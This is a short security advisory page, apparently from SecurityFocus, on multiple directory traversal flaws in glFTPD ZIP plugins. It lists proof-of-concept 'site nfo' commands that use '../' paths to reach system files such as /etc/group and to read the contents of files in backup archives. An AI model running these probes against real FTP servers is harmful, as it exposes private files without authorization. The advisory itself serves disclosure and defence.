Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

glFTPD ZIP Plugins Multiple Directory Traversal Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:

To determine the existence of a file out side the server's root:
site nfo ../etc/group

To determine the existence of the first two files in a directory out side the server's root:
site nfo ../../../../../etc/*

To determine the existence of the first two files in a directory inside the server's root:
site nfo staff/*

To determine the existence of files in the directory tree:
site nfo ../../../../../etc/a*

To determine the existence of files in a ZIP archive:
site nfo ../../*.zip

To disclose the contents of files with names starting with the letter 'p' in a directory:
site nfo ../../backup.zip p*







 

Privacy Statement
Copyright 2009, SecurityFocus